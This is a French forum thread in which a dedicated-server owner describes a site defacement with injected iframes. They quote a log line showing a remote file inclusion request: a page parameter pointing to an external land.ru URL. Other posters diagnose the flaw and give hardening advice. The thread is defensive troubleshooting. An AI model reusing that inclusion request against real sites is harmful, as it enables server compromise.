serveur vulnérable ?

Salut, je dispose d'un serveur dédié ou j'ai plusieurs sites, et hier un hackeur de m... à foutu des .htaccess dans chacun de mes dossiers !!!
En plus de ca il à injecté une ligne de code sur chacune de mes pages avec une frame qui renvoi vers un site pédophile avec un virus apparrement...
Bien entendu j'ai pu tout rétablir grace à un backup, en analysant les logs j'ai pu voir ca :

host-92-5-159-27.as43234.net - - [24/Jun/2008:22:29:50 +0200] "GET /index.php?GJIA=http://joioiskioeriyyskwkdwjsdfewis.land.ru/.html/body?

Comment bannir le domaine as43234 de ma machine entièrement ? Ou alors comment bloqué l'appel d'url extérieur dans mes variables ?
Je précise que mon site est en html php et MySQL, j'ai sécurisé les variables avec des htmlspeciachars... depuis longtemps.
Avez vous une idée à me proposer pour éviter qu'il recommence ?
Merci beaucoup.

deja c'est un pirate de très bas niveau puisqu'il utilise une faille hyper connue...

il faut modifier votre index.php pour que la variable $_GET['GJIA'] face forcement reference à un fichier sur votre serveur

Ok, mais $_GET['GJIA'] suffit donc à ce que le fihcier soit sur le serveur ?
lA VARIABLE GJIA correspond au numéro de la page, mon site est fais sur une seule page index.php?GJIA=le id de la page

Une personne qui taff dans une société et qui à plusieurs dédié après anlyse ma dis la chose suivante :

Apparament, ça fait plusieurs jours que ton serveur était attaqué.
Il ne sont pas rentrés par ssh.
Sans doute qu'ils ont utilisé une vulnérabilité FTP (ce qui leur donne
accès à tous tes fichiers)
Mais tu as aussi phpmyadmin qui est connu pour avoir des failles de
sécurité.

Entre 22h20 et 22h30, les seuls accès qu'on voit sur ton serveur sont
sur du FTP.
C'est pour ça qu'on croit que c'est par là qu'ils sont rentrés.

Ce que tu dois faire:
- Mise à jour des applis (phpmyadmin, apache, ftp)
- Il faut installer ou activer le firewall pour autoriser uniquement
les accès ssh
- si tu as vraiment besoin de phpmyadmin, il faut activer le SSL
(c'est plus sûr)
- il faut changer de server ftp (tu utilises proftpd qui a des faille
reconnues). vsftpd est bien meilleur
- très important : vérifier s'il n'y a pas de root-kits (utiliser
chkrootkit ou linux rootkit detector). C'est la première chose à faire

Voilà....
Il y a du boulot.



Quelqu'un sait il comment réaliser tout ce travail ? Personnellement l'administration de dédié je ne connais pas j'étai en colocation serveur avant... Je paie bien sur Merci

mais non, suffit de regarder votre log:
/index.php?GJIA=http://joioiskioeriyyskwkdwjsdfewis.land.ru/.html/body?

on voit bien qu'il a inclu une page distante par la variable GJIA